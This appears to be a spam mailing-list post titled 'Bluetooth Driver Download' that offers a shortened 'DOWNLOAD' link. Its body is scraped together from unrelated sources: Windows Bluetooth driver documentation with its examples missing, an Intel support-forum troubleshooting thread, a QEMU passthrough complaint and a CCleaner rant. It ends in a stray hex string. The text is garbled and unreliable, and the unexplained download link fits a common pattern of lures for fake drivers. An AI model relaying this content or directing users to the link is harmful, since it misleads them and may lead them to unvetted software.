Bluetooth Driver Download

Analisa Wisdom

Jan 25, 2024, 12:06:56 PMJan 25
to mulmecusen

A user that wants to use a Bluetooth-enabled device brings the device within range of the computer and initiates a connection from the computer to the remote device using the following installation sequence for a client-side profile driver.

If the Found New Hardware Wizard doesn't find an appropriate driver for the device, it prompts the user to insert the profile driver installation media that contains the profile driver's device setup information file (INF file).

bluetooth driver download

DOWNLOADhttps://t.co/e80PFdLoKD

The installation application must communicate with the Bluetooth driver stack to create a service GUID for the functionality to expose. Vendors specify the service GUID in the application and in their device installation INF file.

A profile driver's INF file contains information about a Bluetooth device for client-side installation. For a server-side installation, the INF file specifies a device ID that corresponds to the service GUID created by the installation application. All Bluetooth devices are members of the Bluetooth class. The Bluetooth class installer (Bthci.dll) helps with installing profile drivers.

The Bluetooth driver stack can be restricted to load your profile driver and software to run only on a specific release of a remote device by using Plug and Play IDs in both the remote device and the INF file. Note that the Bluetooth driver stack generates a VID/PID pair only if the device publishes a Plug and Play ID that the stack can detect using SDP. For example:

The Bluetooth driver stack can be restricted to load profile driver and software to run only on a specific local Bluetooth radio by specifying the LOCALMFG tag in the device ID in your INF file. For example:

The last two days, I've been experiencing constant troubles with my bluetooth driver. In summary, the bluetooth toggle bar had disappeared, but did not reappear after turning my pc off and on again. When checking the device manager, the bluetooth driver seemed to be present, but greyed out. Similarly, the network adapter 'Bluetooth device (personal area network)' was greyed out. (See added .png, the icons in red are gone or greyed out).

After looking for ways of dealing with this problem online, I reinstalled the bluetooth driver again, which it successfully did, but again the icons appeared greyed out. After turning my pc off and on again for a second time, suddenly everything was fine again.

However, I quickly noticed that every time my pc went into sleep mode, the problem would occur again, after which I had to reinstall the driver many times over again, turn my pc off and on again, go on online forums to see if it had anything to do with incompatibility issues of older or newer versions ... basically anything I, a layperson, could think of.

I managed to reinstall the most recent bluetooth driver via the Intel website, and miraculously, everything seemed to work again. I then shut down my pc. The next day, I activated my pc and simultaneously activated my headphones to look for bluetooth connection. It connected successfully and keeps doing so, but only if I rigorously avoid getting my pc in sleep mode. At a certain moment, however, when the bluetooth toggle bar was visible but my headphones were disconnected for some odd 15 minutes perhaps, I saw the icon disappear, after which I checked the device manager and found everything in grey again.

By reinstalling the driver several times more, intermixed with turning my pc off and on again, somehow I managed to get bluetooth working again (this time, I downloaded it from the Acer website, where I installed the version they recommended for my particular Acer pc model). IDSA keeps, however, suggesting an update of the Intel Wireless Bluetooth Driver (to version 22.120.0.3), and I'm scared to do it. Also, I'm not sure if the currently working bluetooth driver will or won't crash when I disconnect my headphones again ...

We provide generic drivers for general purposes. Your computer manufacturer (OEM) might have customized drivers and software to enable or alter features, or provide improved operation on your computer. Therefore, the usual recommendation is to use the OEM driver as the first option. Also, Intel Driver & Support Assistant (Intel DSA) just scans drivers updates using the Intel database, which will only offer generic drivers when it comes to third-party systems; in this case, It is not always a must to install driver updates offered by the tool if the current OEM drivers are working fine. In that scenario, you may just disregard the update notification.

1- We understood that this issue started two days ago. Do you remember if there were any Hardware or Software changes (e.g.: operating system, BIOS, Wireless/Bluetooth driver, or software updates?) that may relate to the point when the issue started?

Thanks for replying. I can confirm that after I installed the driver recommend by Acer, bluetooth seemed to work fine. I changed the settings of my pc to never go into sleep mode (like I mentioned before, sleep mode seemed to trigger this 'bug'). Since the time of my previous post, my bluetooth driver has bugged out only once. I had a lot of different .exe files on my pc at the time (all different but similar installation wizards that I downloaded from the Intel or Acer website) and I decided to get red of them all and uninstall the (now greyed out again) bluetooth driver and start out 'clean'.

I downloaded a fresh .exe installation wizard from the Intel website (the one that was recommended for Windows 10 & 11 - I have Windows 11). Everything seemed to be working fine after that. I have experienced no problems since, but I have also been extra careful by never letting my pc go into sleep mode, shutting my pc off when I'm not actively using it, and deactivating bluetooth whenever I'm not listening to any audio. This seems to ensure that the driver icon does not grey out in my device manager.

1. About two or three (maybe more, but certainly not less) weeks before the problem first occurred, I got a recommendation to upgrade from Windows 10 to Windows 11, which I did. However, I doubt that this caused the problems I've experienced with my bluetooth driver because of the lengthy interval between the installation of Windows 11 and the problems first arising.

3. Currently, the device manager tells me that Intel Wireless Bluetooth is working fine. Previously, when the different icons were greyed out in my device manager, it showed 'error code 45', which apparently means that the device is disconnected. I was however unable to connect it in any way because I didn't know how, or why it got disconnected in the first place. This error code persisted every time I reinstalled the driver after it greyed out (while it was working, it said in the general properties that everything was working fine).

4. The computer is four years old. There have never been any issues of any kind, except for the Spotify app, which sometimes automatically reinstalls when I try to open it. This takes a few seconds, a minute max. Perhaps the following might be interesting for you to know: during the process of iteratively discarding and reinstalling my bluetooth driver, I ran 'System Restore' (specifically the option that retains all personal documents, but gets rid of apps and settings) since this reinstalling didn't seem to work. However, this didn't accomplish anything specific, except for me having to reinstall a lot of apps aside from the Bluetooth driver. I also ran, as an administrator, the command sfc /scannow in the command prompt window to check the integrity of my system files and repair them if necessary, but no integrity issues were found.

As I'm writing all this, I'm using my bluetooth successfully and I 'operate' within the abovementioned parameters that I've identified to in a way 'protect' my bluetooth. I'd be very grateful if you could solve this annoying little issue.

In this case, let's try first a clean installation of both Bluetooth and Wireless drivers. The driver or software for your Intel component might have been changed or replaced by the computer manufacturer (OEM), therefore, we recommend trying this first using the customized drivers from Acer* website.

We tried to check for Acer's drivers and we found only this regarding laptop model "SF314-56G". It seems there are no Windows* 11 drivers available for this system, but only for Windows* 10. We recommend checking with ACER* Support for the proper validated drivers for your system.

Thank you for your response. I have done what you proposed in your previous message, but unfortunately, the bluetooth issues are quite persistent. During the last week, bluetooth seemed to be working fine, but it bugged out again a few hours ago. I have attempted several times to reinstall the bluetooth driver as per your instructions, but it doesn't seem to help.

Bluetooth on my Gentoo host works fine, but when passed through to the Windows guest it shits itself. I've attached my Qemu logs, pictures of my windows driver properties, a photo of my device in Virt-Manager, and will attach anything else needed.

CCleaner ruined my computer! OMG, I spent about 20 hours on this. I'm so mad! I finally fixed it though. The only way was to completely re-install Windows 11 and BLOCK the "recommended" Avrcp Transport driver update for your Bluetooth speaker.

The driver will be under the Bluetooth section. For all you folks out there that use Bluetooth speaker as your computer audio DO NOT INSTALL THIS RECOMMENDED BLUETOOTH DRIVER UPDATE IN CCLEANER! It will BREAK your Bluetooth to only connect your speakers as a headset and there is no way to fix this other than to re-install Windows. I have now skipped this driver, but the damage and time I spent on this is done. There's no getting back those 20 hours. After a 2nd Windows reinstall I connected 2 new speakers (Sony and Bose) CCleaner recommended the Avrcp Transport update from 2014 for both of them. I installed it and MY Bluetooth BROKE AGAIN! I had to reinstall Windows for a 3rd time.

356178063d